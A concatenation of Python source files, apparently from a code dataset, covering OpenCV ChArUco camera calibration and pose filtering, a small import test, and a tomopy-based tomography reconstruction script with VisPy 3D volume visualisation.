str(defaultConfig_path), cv2.FILE_STORAGE_READ)
self.aruco_dict_num = int(
default_config.getNode('charuco_dict').real())
self.charuco_square_length = default_config.getNode(
'charuco_square_lenght').real() # ARGH, spelling mistake!
self.charuco_marker_size = default_config.getNode(
'charuco_marker_size').real()
self.width = int(default_config.getNode(
'camera_resolution').at(0).real())
self.height = int(default_config.getNode(
'camera_resolution').at(1).real())
default_config.release()
else:
self.write_defaultConfig()
aruco_dict = cv2.aruco.Dictionary_get(self.aruco_dict_num)
# Create specific camera calibration if no one already exists
# using the opencv_interactive-calibration program.
cameraParameters_path = Path(
'./data/cameraParameters_%s.xml' % self.cam_id)
if not cameraParameters_path.exists():
print('\nStarting the camera id%s lens calibration.' % self.cam_id)
self.cap.release() # Release VideoCapture before CLI usage
subprocess.call(
['opencv_interactive-calibration', '-d=0.25', '-h=7', '-w=5',
'-sz=%f' % self.charuco_square_length, '--t=charuco',
'-pf=' + str(defaultConfig_path),
'-ci=' + str(self.cam_id),
'-of=' + str(cameraParameters_path),
'-flip=' + str(self.vertical_flip).lower()])
if sys.platform == "linux" or platform == "linux2":
self.cap = cv2.VideoCapture(self.cam_path, cv2.CAP_V4L2)
else:
self.cap = cv2.VideoCapture(self.cam_id)
self.set_camera_settings() # Re-set camera settings
# Load the camera calibration file.
if cameraParameters_path.exists():
print(' Found cameraParameters_%s.xml' % self.cam_id)
calibration_file = cv2.FileStorage(
str(cameraParameters_path), cv2.FILE_STORAGE_READ)
self.camera_matrix = calibration_file.getNode('cameraMatrix').mat()
self.dist_coeffs = calibration_file.getNode('dist_coeffs').mat()
self.width = int(calibration_file.getNode(
'cameraResolution').at(0).real())
self.height = int(calibration_file.getNode(
'cameraResolution').at(1).real())
if calibration_file.getNode('focus').isReal(): # If focus val
self.focus = float(calibration_file.getNode('focus').real())
self.set_focus(self.focus * 50)
# Specific Fish-Eye parameters
# self.r = calibrationParams.getNode("R").mat()
# self.new_camera_matrix = calibrationParams.getNode(
# "newCameraMatrix").mat()
calibration_file.release()
else:
raise ValueError(
"cameraParameters_%s.xml not found!\n\t"
"Please finish the calibration and press 's' to save to file."
% self.cam_id)
self.board = cv2.aruco.CharucoBoard_create(
5, 7, self.charuco_square_length, self.charuco_marker_size,
aruco_dict)
print('Camera %s calibration correction done!' % self.cam_id)
def detect_markers(self):
"""Detect ChAruco markers.
Returns:
frame (OpenCV Mat): A frame read from the VideoCapture method.
corners (Numpy array): list of corners 2D coordinates.
ids (Numpy array): list of detected marker identifiers.
"""
parameters = cv2.aruco.DetectorParameters_create()
frame = self.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
corners, ids, rej = cv2.aruco.detectMarkers(
gray, self.board.dictionary, parameters=parameters)
corners, ids, rej, recov = cv2.aruco.refineDetectedMarkers(
gray, self.board, corners, ids, rej,
cameraMatrix=self.camera_matrix, distCoeffs=self.dist_coeffs)
return frame, corners, ids
def estimate_board_posture(self, frame=None, corners=None, ids=None):
"""Estimate ChAruco board posture.
Arguments:
frame (OpenCV Mat): A frame read from the VideoCapture method.
corners (Numpy array): list of corners 2D coordinates.
ids (Numpy array): list of detected marker identifiers.
Return:
frame (OpenCV Mat): Frame with the board posture drawn
"""
# If we do not already have detect markers:
if frame is None:
frame, corners, ids = self.detect_markers()
if ids is None: # No detected marker
frame = self.draw_text(frame, 'No ChAruco marker detected !')
# time.sleep(0.1) # Sleep to give the time to move the panel
else: # if there is at least one marker detected
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# Draw axis for the global board
retval, cha_corns, cha_ids = cv2.aruco.interpolateCornersCharuco(
corners, ids, gray, self.board,
cameraMatrix=self.camera_matrix, distCoeffs=self.dist_coeffs)
if retval:
frame_with_board = cv2.aruco.drawDetectedCornersCharuco(
frame, cha_corns, cha_ids, (0, 255, 0))
# Posture estimation of the global ChAruco board
retval, rvecs, tvecs = cv2.aruco.estimatePoseCharucoBoard(
cha_corns, cha_ids, self.board,
self.camera_matrix, self.dist_coeffs)
if retval is True:
rvecs, tvecs = self.board_post.update(rvecs, tvecs)
frame = cv2.aruco.drawAxis(
frame_with_board, self.camera_matrix, self.dist_coeffs,
rvecs, tvecs, 4 * self.charuco_square_length)
else:
frame = self.draw_text(
frame, 'Not enough Charuco markers detected.')
else:
frame = self.draw_text(
frame, 'Not enough resolution. Board is too far.')
return frame
def estimate_markers_posture(self, frame=None, corners=None, ids=None):
"""Estimate ChAruco markers posture.
Arguments:
frame (OpenCV Mat): A frame read from the VideoCapture method.
corners (Numpy array): list of corners 2D coordinates.
ids (Numpy array): list of detected marker identifiers.
Return:
frame (OpenCV Mat): Frame with all detected markers posture drawn.
"""
# If we do not already have detect markers:
if frame is None:
frame, corners, ids = self.detect_markers()
if ids is None: # No detected marker
frame = self.draw_text(frame, 'No ChAruco marker detected !')
# time.sleep(0.1) # Sleep to give the time to move the panel
else: # if there is at least one marker detected
# Draw each detected marker
frame = cv2.aruco.drawDetectedMarkers(frame, corners, ids)
rvecs, tvecs, _objPoints = cv2.aruco.estimatePoseSingleMarkers(
corners, self.charuco_square_length,
self.camera_matrix, self.dist_coeffs)
# Draw axis for each marker
for rvec, tvec in zip(rvecs, tvecs):
frame = cv2.aruco.drawAxis(
frame, self.camera_matrix, self.dist_coeffs,
rvec, tvec, self.charuco_square_length)
return frame
def estimate_board_and_markers_posture(self):
"""Estimate posture of ChAruco markers and posture of global board.
Return:
frame (OpenCV Mat): Frame with the board and markers postures.
"""
frame, corners, ids = self.detect_markers()
frame = self.estimate_markers_posture(frame, corners, ids)
frame = self.estimate_board_posture(frame, corners, ids)
return frame
# def py_charuco_camera_calibration(self):
# """TODO: camera calibration with Python."""
# parameters = cv2.aruco.DetectorParameters_create()
# corners_list = []
# ids_list = []
# print('Move the charuco board in front of the', self.cam_id)
# while len(corners_list) < 50:
# frame = self.read()
# gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# corners, ids, rej = cv2.aruco.detectMarkers(
# gray, dictionary=aruco_dict, parameters=parameters)
# corners, ids, rej, recovered = cv2.aruco.refineDetectedMarkers(
# gray, cv2.aruco, corners, ids, rej,
# cameraMatrix=self.camera_matrix, distCoeffs=self.dist_coef)
# if corners is None or len(corners) == 0:
# print('No ChAruco corner detected!')
# continue
# ret, corners, ids = cv2.aruco.interpolateCornersCharuco(
# corners, ids, gray, cb)
# corners_list.append(corners)
# ids_list.append(ids)
# time.sleep(0.1) # Sleep to give the time to move the panel
# print('Enough frames for %s calibration!' % self.cam_id)
# # Calibrate camera
# ret, K, dist_coef, rvecs, tvecs = cv2.aruco.calibrateCameraCharuco(
# corners_list, ids_list, cv2.aruco, (w, h), K,
# dist_coef, flags=cv2.CALIB_USE_INTRINSIC_GUESS)
# print('camera calib mat after\n%s' % K)
# print('camera dist_coef %s' % dist_coef.T)
# print('calibration reproj err %s' % ret)
# distCoeffsInit = np.zeros((5, 1))
# flags = (cv2.CALIB_USE_INTRINSIC_GUESS + cv2.CALIB_RATIONAL_MODEL + cv2.CALIB_FIX_ASPECT_RATIO) # noqa
# # flags = (cv2.CALIB_RATIONAL_MODEL)
# (ret, camera_matrix, distortion_coefficients0,
# rotation_vectors, translation_vectors,
# stdDeviationsIntrinsics, stdDeviationsExtrinsics,
# perViewErrors) = cv2.aruco.calibrateCameraCharucoExtended(
# charucoCorners=allCorners, charucoIds=allIds, board=board,
# imageSize=imsize, cameraMatrix=cameraMatrixInit,
# distCoeffs=distCoeffsInit, flags=flags, criteria=(
# cv2.TERM_CRITERIA_EPS & cv2.TERM_CRITERIA_COUNT, 10000, 1e-9))
def read_undistort(self):
"""Read an undistored camera frame."""
return cv2.undistort(
src=self.read(), cameraMatrix=self.camera_matrix,
distCoeffs=self.dist_coeffs)
def save_focus(self):
"""Save the camera focus value to the cameraParameters.xml file."""
if self.focus:
cameraParameters_path = Path(
'./data/cameraParameters_%s.xml' % self.cam_id)
self.write_append_to_FileStorage(
str(cameraParameters_path),
string='<focus>%f</focus>\n' % self.focus)
def set_focus(self, focus):
"""Set camera focus."""
self.cap.set(28, focus * 0.02) # CV_CAP_PROP_FOCUS
# min: 0.0 (infinity), max: 1.0 (1cm), increment:0.02 for C525 & C920
self.focus = self.cap.get(28)
print('Camera %d | Focus set:%f' % (self.cam_id, self.focus))
def show_focus_window(self):
"""Show a window with a focus slider."""
cv2.namedWindow('Focus', cv2.WINDOW_FREERATIO)
cv2.resizeWindow('Focus', 600, 30)
focus = self.focus
cv2.createTrackbar('Camera %d focus' % self.cam_id, 'Focus', 0, 20,
self.set_focus)
if focus:
cv2.setTrackbarPos('Camera %d focus' % self.cam_id, 'Focus',
int(focus * 50))
def write_append_to_FileStorage(self, str_path, string):
"""Append a string to a .xml file opened with cv2.FileStorage.
Args:
str_path (str): the file path to append.
string (str): the string to append.
"""
f = open(str_path, 'r+')
ln = f.readline()
while ln != '</opencv_storage>\n':
ln = f.readline()
f.seek(f.tell() - 18)
f.write(string)
f.write('</opencv_storage>\n')
f.close()
def write_defaultConfig(self):
"""Write defaultConfig.xml with the ChAruco specific parameters."""
print('\n')
self.charuco_square_length = input_float(
'Enter the black square length in cm: ')
self.charuco_marker_size = input_float(
'Enter the Aruco marker length in cm: ')
defaultConfig_path = Path('./data/defaultConfig.xml')
file = cv2.FileStorage(
str(defaultConfig_path), cv2.FILE_STORAGE_WRITE)
file.write('charuco_dict', self.aruco_dict_num)
file.write('charuco_square_lenght', self.charuco_square_length)
# ARGH, spelling mistake in the opencv_interactive-calibration app..
# https://github.com/opencv/opencv/blob/master/apps/interactive-calibration/parametersController.cpp#L40
file.write('charuco_marker_size', self.charuco_marker_size)
file.write('max_frames_num', 40)
file.write('min_frames_num', 20)
# To write a right <camera_resolution> element we need to update
# OpenCV to add std::vect<int> support, see my fork and discussion:
# https://github.com/a1rb4Ck/opencv/commit/58a9adf0dd8ed5a7f1f712e99bf0f7b1340f39a8
# http://answers.opencv.org/question/199743/write-sequence-of-int-with-filestorage-in-python/
#
# Working code with the fork:
# file.write('camera_resolution', (
# [self.width, self.height]))
#
# <camera_resolution> is an Seq of Integers. In C++ it is written by <<
# Python bindings must be added to support seq of int as std::vect<int>
file.release()
# Without updating OpenCV, we seek to append <camera_resolution>
self.write_append_to_FileStorage(
str(defaultConfig_path),
string='<camera_resolution>\n %d %d</camera_resolution>\n' % (
self.width, self.height))
class PostureBuffer(object):
"""PostureBuffer class used to setup and use camera with lens correction.
Attributes:
window_length (int): Moving average window size (number of frame).
avg_max_std (float): Maximum moving average standard deviation.
buff_tvecs (Numpy array): Buffer of rotation vecs moving avg filter.
buff_rvecs (Numpy array): Buffer of translation vecs moving avg filter.
"""
def __init__(self, window_length=4, avg_max_std=0.1):
"""Initialize PostureBuffer class.
Args:
window_length (int): Moving average window size (number of frame).
avg_max_std (float): Maximum moving average standard deviation.
"""
self.window_length = window_length
self.avg_max_std = avg_max_std
self.buff_tvecs = None # TODO: pre-allocate array of window_length
self.buff_rvecs = None
def update(self, rvecs, tvecs):
"""Update the moving average posture buffer and do the filtering.
Arguments:
rvecs (Numpy array): Posture rotation vectors (3x1).
tvecs (Numpy array): Posture translation vectors (3x1).
Returns:
rvecs (Numpy array): Filtered (averaged) posture rotation vectors.
tvecs (Numpy array): Filtered (avg) posture translation vectors.
"""
# Notes:
# https://github.com/avmeer/ComputerVisionAugmentedReality
# ○ ArUco tags are hard to pick out perfectly each time.
# ○ Position of the marker is noisy and the models would shake.
# ○ Averaging the last THREE position matrices helped to stabilize.
# Appending rvec and tvec postures to buffer
if self.buff_rvecs is None:
self.buff_rvecs = rvecs
else:
self.buff_rvecs = np.append(self.buff_rvecs, rvecs, axis=1)
if self.buff_tvecs is None:
self.buff_tvecs = tvecs
else:
self.buff_tvecs = np.append(self.buff_tvecs, tvecs, axis=1)
if self.buff_rvecs.shape[1] > self.window_length:
self.buff_rvecs = np.delete(self.buff_rvecs, 0, 1)
if self.buff_tvecs.shape[1] > self.window_length:
self.buff_tvecs = np.delete(self.buff_tvecs, 0, 1)
# TODO: optimize delete without copying? But np.array are immutable..
# Standard deviation filtering, if the board had a to big displacement.
stdm = self.avg_max_std # Moving/Rolling average filter max std
rvecs_std = np.std(self.buff_rvecs, axis=1)
if rvecs_std[0] > stdm or rvecs_std[1] > stdm or rvecs_std[2] > stdm:
self.buff_rvecs = rvecs
else:
rvecs = np.mean(self.buff_rvecs, axis=1)
tvecs_std = np.std(self.buff_tvecs, axis=1)
if tvecs_std[0] > stdm or tvecs_std[1] > stdm or tvecs_std[2] > stdm:
self.buff_tvecs = tvecs
else:
tvecs = np.mean(self.buff_tvecs, axis=1)
return rvecs, tvecs
```
#### File: camera_fusion/tests/test_CamerasFusion.py
```python
import os
import sys
import numpy as np
sys.path.insert(
0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
import camera_fusion # noqa
# Import tests
def test_import_CamerasFusion():
"""Test CamerasFusion class importation."""
a = camera_fusion.CamerasFusion.__module__ == 'camera_fusion.CamerasFusion'
assert a
# CamerasFusion tests
# TODO: test CamerasFusion points matching
``` |
{
"source": "a1rb4Ck/tomo",
"score": 2
} |
#### File: a1rb4Ck/tomo/tomo_prod.py
```python
from __future__ import print_function, division
try:
import re # for string processing
import os
from pathlib import Path
import sys # for folder scanning
import joblib # joblib version: 0.9.4
import time # for performance timing
import numpy as np # for matrix works
import PIL # for image resizing
from PIL import Image
import matplotlib.pyplot as plt
import progressbar
import tomopy # for inverse tomography transformation
# import vtk #for 3D visualization but can't compile it on my Sierra
# import PyOpenGL #for 3D visualization using full OpenGL functionality available on your system
import PyQt5 # for vispy visualisation
from itertools import cycle
import vispy # for interractive 3D plotting
from vispy import app, scene, io
from vispy.scene.visuals import Text
from vispy.color import get_colormaps, BaseColormap
from vispy.visuals.transforms import (
STTransform, PolarTransform, AffineTransform)
# from vispy.visuals.transforms import MatrixTransform #MatrixTransform is used for volume rotation #TODO: wait VisPy 0.5.0 to re-add MatrixTransform
import imageio # for .gif recording
except ImportError as exc:
sys.stderr.write("Error importing dependancies: ({})".format(exc))
m = re.search('\'(.+?)\'', format(exc))
print('You need some librairies ! Please try to install it by runing:')
print('pip install %s' % m.group(1))
def get_images():
# CREATE TOMOGRAPHIC IMAGES MATRIX FROM FILES
input_dir = './raw_input/'
print('Let\'s create tomomatrix from raw images')
print('input directory:' + input_dir)
print('Reshaping image to size %d x %d pixels' % (img_size, img_size))
tclass = [d for d in os.listdir(input_dir)]
# tclass = tclass[0:202] #we only need 202 images to do a 180deg rotation
measurements_matrix = []
counter = 0
writer = imageio.get_writer('raw_tomo.mp4', fps=50, quality=8)
bar_crop = progressbar.ProgressBar(
redirect_stdout=True, max_value=len(tclass))
bar_crop.start()
for x in tclass:
try:
img = Image.open(os.path.join(input_dir + '/' + x))
# Hand crafted cropping values : #TODO: automatize or user selectable
# bottom-500
img = img.crop((1300, 1700, img.size[0] - 550, img.size[1] - 600))
img = img.resize((int(img_size), int(img_size)), Image.ANTIALIAS)
measurements_matrix.append(np.asarray(img))
writer.append_data(im)
except Exception:
print("Error resize file : %s - %s " % x)
counter += 1
bar_crop.update(counter)
bar_crop.finish()
writer.close()
# Now we have 400 images (256,256)
mat = np.array(measurements_matrix)
print('tomo matrix created! %d image resized. A rotation .mp4 was also created ;!' % counter)
# Let's save our measurements_matrix
joblib.dump(mat, 'TOMO_360_angle_images.pkl')
print('tomo matrix saved to TOMO_360_angle_images.pkl')
# First dimension: Capture angles
# Second dimension: Image width X
# Third dimension: Image height Y
def sample_stack_Angles(stack, rows=5, cols=5, start_with=0, show_every=16, algo='defaut'):
# Displaying all images :
fig, ax = plt.subplots(rows, cols, figsize=[12, 12])
for i in range(rows * cols):
ind = start_with + i * show_every
ax[int(i / rows), int(i % rows)].set_title('Angle %g°' % (ind * 0.9))
ax[int(i / rows), int(i % rows)
].imshow(stack[ind, :, :], cmap=plt.cm.Greys_r)
ax[int(i / rows), int(i % rows)].axis('off')
#plt.suptitle('%s images' % algo, fontsize=20)
plt.tight_layout()
plt.savefig('%s_360_angles.png' % algo, dpi=300)
plt.close()
def sample_stack_proj_Angles(obj, angles, rows=5, cols=5, start_with=0, show_every=16, algo='defaut'):
sim = tomopy.project(obj, angles) # Calculate projections
fig, ax = plt.subplots(rows, cols, figsize=[12, 12])
for i in range(rows * cols):
ind = start_with + i * show_every
ax[int(i / rows), int(i % rows)].set_title('Angle %g°' % (ind * 0.9))
ax[int(i / rows), int(i % rows)
].imshow(sim[ind, :, :], cmap=plt.cm.Greys_r)
ax[int(i / rows), int(i % rows)].axis('off')
#plt.suptitle('%s images' % algo, fontsize=20)
plt.tight_layout()
plt.savefig('%s_proj_360_angles.png' % algo, dpi=300)
plt.close()
def sample_stack_Z(stack, rows=4, cols=4, start_with=0, show_every=16, algo='default'):
# Slice display from https://www.raddq.com/dicom-processing-segmentation-visualization-in-python/
fig, ax = plt.subplots(rows, cols, figsize=[12, 12])
for i in range(rows * cols):
ind = start_with + i * show_every
ax[int(i / rows), int(i % rows)].set_title('slice %d' % ind)
ax[int(i / rows), int(i % rows)
].imshow(stack[ind, :, :], cmap=plt.cm.Greys_r)
ax[int(i / rows), int(i % rows)].axis('off')
#plt.suptitle('Reconstructed Z slice', fontsize=20)
plt.tight_layout()
plt.savefig('%s_Z_stack_360_.png' % algo, dpi=300)
plt.close()
# - - - - - - - - - - - - - - VisPy 3D visualization - - - - - - - - - - - - - - - -
# create colormaps that work well for translucent and additive volume rendering
class TransFire(BaseColormap):
glsl_map = """
vec4 translucent_fire(float t) {
return vec4(pow(t, 0.5), t, t*t, max(0, t*1.05 - 0.05));
}
"""
class TransGrays(BaseColormap):
glsl_map = """
vec4 translucent_grays(float t) {
return vec4(t, t, t, t*0.05);
}
"""
def scene_building(recon_algos):
# Prepare canvas
canvas = scene.SceneCanvas(keys='interactive', size=(1024, 768), show=True)
# canvas.measure_fps()
# Set up a viewbox to display the image with interactive pan/zoom
view = canvas.central_widget.add_view()
# Set whether we are emulating a 3D texture
emulate_texture = False
# Create the volume visuals for the different reconstructions
volume1 = scene.visuals.Volume(recon_algos[0], parent=view.scene, threshold=0.225,
emulate_texture=emulate_texture)
volume2 = scene.visuals.Volume(recon_algos[1], parent=view.scene, threshold=0.225,
emulate_texture=emulate_texture)
volume3 = scene.visuals.Volume(recon_algos[2], parent=view.scene, threshold=0.225,
emulate_texture=emulate_texture)
volume4 = scene.visuals.Volume(recon_algos[3], parent=view.scene, threshold=0.225,
emulate_texture=emulate_texture)
volume5 = scene.visuals.Volume(recon_algos[4], parent=view.scene, threshold=0.225,
emulate_texture=emulate_texture)
#volume1.transform = scene.STTransform(translate=(64, 64, 0))
# Hacky cyclic volume display setup:
volume1.visible = True # set first volume as visible, then switch with 3
volume2.visible = False
volume3.visible = False
volume4.visible = False
volume5.visible = False
t1 = Text('ART reconstruction', parent=canvas.scene, color='white')
t1.font_size = 18
t1.pos = canvas.size[0] // 2, canvas.size[1] - 10
t2 = Text('fbp reconstruction', parent=canvas.scene, color='white')
t2.font_size = 18
t2.pos = canvas.size[0] // 2, canvas.size[1] - 10
t3 = Text('sirt reconstruction', parent=canvas.scene, color='white')
t3.font_size = 18
t3.pos = canvas.size[0] // 2, canvas.size[1] - 10
t4 = Text('ospml_quad reconstruction', parent=canvas.scene, color='white')
t4.font_size = 18
t4.pos = canvas.size[0] // 2, canvas.size[1] - 10
t5 = Text('pml_quad reconstruction', parent=canvas.scene, color='white')
t5.font_size = 18
t5.pos = canvas.size[0] // 2, canvas.size[1] - 10
t1.visible = True
t2.visible = False
t3.visible = False
t4.visible = False
t5.visible = False
# Implement axis connection with cam2
@canvas.events.mouse_move.connect
def on_mouse_move(event):
if event.button == 1 and event.is_dragging:
axis.transform.reset()
axis.transform.rotate(cam2.roll, (0, 0, 1))
axis.transform.rotate(cam2.elevation, (1, 0, 0))
axis.transform.rotate(cam2.azimuth, (0, 1, 0))
axis.transform.scale((50, 50, 0.001))
axis.transform.translate((50., 50.))
axis.update()
# Implement key presses
@canvas.events.key_press.connect
def on_key_press(event):
global opaque_cmap, translucent_cmap
if event.text == '1':
cam_toggle = {cam1: cam2, cam2: cam3, cam3: cam1}
view.camera = cam_toggle.get(view.camera, cam2)
print(view.camera.name + ' camera')
if view.camera is cam2:
axis.visible = True
else:
axis.visible = False
elif event.text == '2':
methods = ['mip', 'translucent', 'iso', 'additive']
method = methods[(methods.index(volume1.method) + 1) % 4]
print("Volume render method: %s" % method)
cmap = opaque_cmap if method in [
'mip', 'iso'] else translucent_cmap
volume1.method = method
volume1.cmap = cmap
elif event.text == '3': # hacky toogle between different reconstructed volumes
if(volume1.visible):
volume1.visible = False
volume2.visible = True
t1.visible = False
t2.visible = True
# t1.update()
elif(volume2.visible):
volume2.visible = False
volume3.visible = True
t2.visible = False
t3.visible = True
elif(volume3.visible):
volume3.visible = False
volume4.visible = True
t3.visible = False
t4.visible = True
elif(volume4.visible):
volume4.visible = False
volume5.visible = True
t4.visible = False
t5.visible = True
else:
volume5.visible = False
volume1.visible = True
t5.visible = False
t1.visible = True
elif event.text == '4':
if volume1.method in ['mip', 'iso']:
cmap = opaque_cmap = next(opaque_cmaps)
else:
cmap = translucent_cmap = next(translucent_cmaps)
volume1.cmap = volume2.cmap = volume3.cmap = volume4.cmap volume5.cmap = cmap
elif event.text == '0':
cam1.set_range()
cam3.set_range()
elif event.text != '' and event.text in '[]':
s = -0.025 if event.text == '[' else 0.025
volume1.threshold += s
#volume2.threshold += s
th = volume1.threshold if volume1.visible else volume2.threshold
print("Isosurface threshold: %0.3f" % th)
# for testing performance
#@<EMAIL>
# def on_draw(ev):
# canvas.update()
# @canvas.connect
# def on_timer(ev):
# # Animation speed based on global time.
# t = event.elapsed
# c = Color(self.color).rgb
# # Simple sinusoid wave animation.
# s = abs(0.5 + 0.5 * math.sin(t))
# self.context.set_clear_color((c[0] * s, c[1] * s, c[2] * s, 1))
# self.update()
# Create three cameras (Fly, Turntable and Arcball)
fov = 60.
cam1 = scene.cameras.FlyCamera(parent=view.scene, fov=fov, name='Fly')
cam2 = scene.cameras.TurntableCamera(parent=view.scene, fov=fov,
name='Turntable')
cam3 = scene.cameras.ArcballCamera(
parent=view.scene, fov=fov, name='Arcball')
view.camera = cam2 # Select turntable at first
# Create an XYZAxis visual
axis = scene.visuals.XYZAxis(parent=view) # view.scene tout court
s = STTransform(translate=(50, 50), scale=(50, 50, 50, 1))
affine = s.as_affine()
axis.transform = affine
# Setup colormap iterators
opaque_cmaps = cycle(get_colormaps())
translucent_cmaps = cycle([TransFire(), TransGrays()])
opaque_cmap = next(opaque_cmaps)
translucent_cmap = next(translucent_cmaps)
# TODO: add a colorbar, fix error: AttributeError: module 'vispy.scene' has no attribute 'ColorBarWidget'
#grid = canvas.central_widget.add_grid(margin=10)
# cbar_widget = scene.ColorBarWidget(cmap=translucent_cmaps, orientation="right") #cmap="cool"
# grid.add_widget(cbar_widget)
# cbar_widget.pos = (800, 600)#(300, 100)
# cbar_widget.border_color = "#212121"
# grid.bgcolor = "#ffffff"
# Create a rotation transform:
# tr = MatrixTransform() #TODO: wait 0.5.0 to re-add MatrixTransform
# Let's record a .gif:
gif_file = Path("reconstruct_animation.mp4")
if gif_file.is_file():
print('reconstruct_animation.mp4 is already in the folder, please delete it to get a new one')
else:
print('Let\'s record a .mp4 of the reconstructed volume:')
n_steps = 450 # 360
step_angle = 0.8 # 1.
# [] #0.1 fail, 0, 1 fail, (0.5, 0.5, 0.5)ok
rotation_axis = np.array([0, 0, 1])
# rt=scene.AffineTransform()
#volume1.transform = rt
#volume1.transform.rotate(angle=step_angle, axis=rotation_axis)
#volume1.transform.translate([1, 1, 0])
axis.visible = False
#view.camera.set_range(x=[-3, 3])
writer = imageio.get_writer(
'reconstruct_animation.mp4', fps=50, quality=8)
# TODO: add a progress bar
gif_bar = progressbar.ProgressBar(
redirect_stdout=True, max_value=n_steps)
gif_bar.start()
for i in range(n_steps): # * 2):
im = canvas.render()
writer.append_data(im)
view.camera.transform.translate([1.8, -1.8, 0])
view.camera.transform.rotate(step_angle, rotation_axis)
#volume1.transform.rotate(angle=step_angle, axis=rotation_axis)
gif_bar.update(i)
gif_bar.finish()
writer.close()
axis.visible = True
# from https://stackoverflow.com/questions/5376837/how-can-i-do-an-if-run-from-ipython-test-in-python
def run_from_ipython():
try:
__IPYTHON__
print('Running inside IPython: Let\'s use VisPy Interactive mode')
return True
except NameError:
return False
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - IMPERATIVE PROGRAM - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
# Setting tomographic images size :
img_size = 256 # 256
# First we need to create or load the tomo matrix :
tomo_file = Path("TOMO_360_angle_images.pkl")
if tomo_file.is_file():
print('TOMO_360_angle_images.pkl is in the folder, let\'s load it:')
else:
get_images()
# Loading dataset
# , protocol=2)#protocol=2 for python2, 3 by defaut with python3
mat_360 = joblib.load('TOMO_360_angle_images.pkl')
print("TOMO_360_angle_images.pkl loaded !")
# Let's compute the inverse radon transform, reconstruct from all images
# from http://scikit-image.org/docs/dev/auto_examples/transform/plot_radon_transform.html
# Set data collection angles as equally spaced between 0-180 degrees.
# 0.9deg rotation between images
# for 180deg rotation, only taking images 1 to 201:
# total_rotation = 180 # 200 images *0.9deg, (full image set = 255 images * 0.9deg)
total_rotation = 360 # for 360deg imaging
nb_angles = int(total_rotation / 0.9)
# *2 because tomopy.angles() compute angles for a full 180° rotation, not 360°
theta = tomopy.angles(nb_angles) * 2
# Flat-field correction of raw data.
# proj = tomopy.normalize(proj, flat, dark) #NEED FLAT AND DARK VALUES
# norm_mat_180 = tomopy.normalize_bg(mat_180, theta) # Normalization from background TODO: FIX THIS PYTHON REBOOT!
norm_mat_360 = mat_360 / mat_360.mean() # simplest normalization
# Plotting raw measurements by angles:
raw_file = Path("Raw_360_angles.png")
if raw_file.is_file():
print('Raw_360_angles.png already in folder, please delete to get a new-one')
else:
sample_stack_Angles(mat_360, algo='Raw')
# Find rotation center #FAILURE - TODO: FIX THIS PYTHON REBOOT!
# rot_center = tomopy.find_center(sim, theta, init=125,# mask=True, #initial gess:256/2
# ind=0, tol=0.5)
#print("Center of rotation: ", rot_center)
# sim_log = tomopy.minus_log(mat_180) # TODO: Why use this ? Getting sim_log.max=inf...
# Simple reconstruct with ART algorithm:
# recon = tomopy.recon(mat_180, theta, algorithm='art')#, center=rot_center,)
# algorithm='bart'BOF, 'fbp'SUPERBOF, 'mlem'BOF, 'osem'BOF, 'ospml_hybrid'MOUAIS, 'ospml_quad'BOF, 'pml_hybrid'BOF, 'pml_quad'MOUAIS, 'sirt'MOUAIS
#filter_name = 'shepp', 'cosine', 'hann', 'hamming', 'ramlak', 'parzen', 'butterworth'
# recon is (z, x, y)
# masked_recon = tomopy.circ_mask(recon, axis=0, ratio=0.9)
# plt.imshow(masked_recon[:,120,:], cmap=plt.cm.Greys_r)
# plt.show()
# Reconstructing with all avaible algorithms :
recon_file = Path("360_recon_all_algo_noCentering.pkl")
if recon_file.is_file():
print('360_recon_all_algo_noCentering.pkl is in the folder, let\'s load it')
recon_algos = joblib.load('360_recon_all_algo_noCentering.pkl')
recon = recon_algos[0] # select ART algorithm
else:
# We only select algortihms which held to differences in the reconstruction:
# ,'ospml_hybrid', 'pml_hybrid', 'bart', 'mlem', 'osem'}
algorithms = {'art', 'fbp', 'sirt', 'ospml_quad', 'pml_quad'}
print('Let\'s reconstruct with: ' + format(algorithms) + ' algorithms')
# Display a progressbar
bar = progressbar.ProgressBar(redirect_stdout=True, term_width=2, max_value=len(
algorithms) * 15) # widgets=[progressbar.Bar('=', '[', ']'), ' ', progressbar.Percentage()]
bar.start()
start = time.time()
recon_algos = []
i = 0
for algo in algorithms:
# , center=rot_center,)
recon = tomopy.recon(mat_360, theta, algorithm=algo)
i = i + 10
bar.update(i)
# Plotting reconstructed projections by angles
sample_stack_proj_Angles(recon, theta, algo=algo)
i = i + 4
bar.update(i)
# Plotting reconstructed Z slices by Y height
sample_stack_Z(recon, algo=algo)
recon_algos.append(recon)
i = i + 1
bar.update(i)
bar.finish()
joblib.dump(recon_algos, '360_recon_all_algo_noCentering.pkl') # 20 Mo
end = time.time()
print("Done in " + str(end - start) + "ms")
recon = recon_algos[0] # select ART algorithm
# 3D rotational animation :
print('Let\'s display the reconstructed 3D volume')
# Using VisPy as I can't compile VTK 8.0.0 : http://vispy.org/plot.html
# print(vispy.sys_info())
# https://github.com/vispy/vispy/blob/master/examples/basics/scene/volume.py
"""
Example volume rendering
Controls:
* ESC - to quit
* 1 - toggle camera between first person (fly), regular 3D (turntable) and
arcball
* 2 - toggle between volume rendering methods
* 3 - toggle between stent-CT / brain-MRI image
* 4 - toggle between colormaps
* 0 - reset cameras
* [] - decrease/increase isosurface threshold
With fly camera:
* WASD or arrow keys - move around
* SPACE - brake
* FC - move up-down
* IJKL or mouse - look around
"""
# if run_from_ipython():
# #app.use_app('glfw') # for testing specific backends
# app.set_interactive() #to use in IPython
# scene_building()
# # All variables listed in this scope are accessible via the console.
# #app.Timer(interval=0.0, connect=None, iterations=-1, start=True)#, app=None)
# #app.Timer('auto', connect=on_timer(), start=True) #TODO
# # In IPython, try typing any of the following:
# # canvas.color = (1.0, 0.0, 0.0)
# canvas.color = 'white'#'red'
# canvas.show()
# else:
print(__doc__)
# 'ql+' If PyOpenGL is not avaible please use gl='gl2'
vispy.use(app='glfw', gl='gl2')
# app='PyQt5'(framebuffer quarter on HiDPi), 'pyglet'(slow, bug), 'glfw',
scene_building(recon_algos)
app.run()
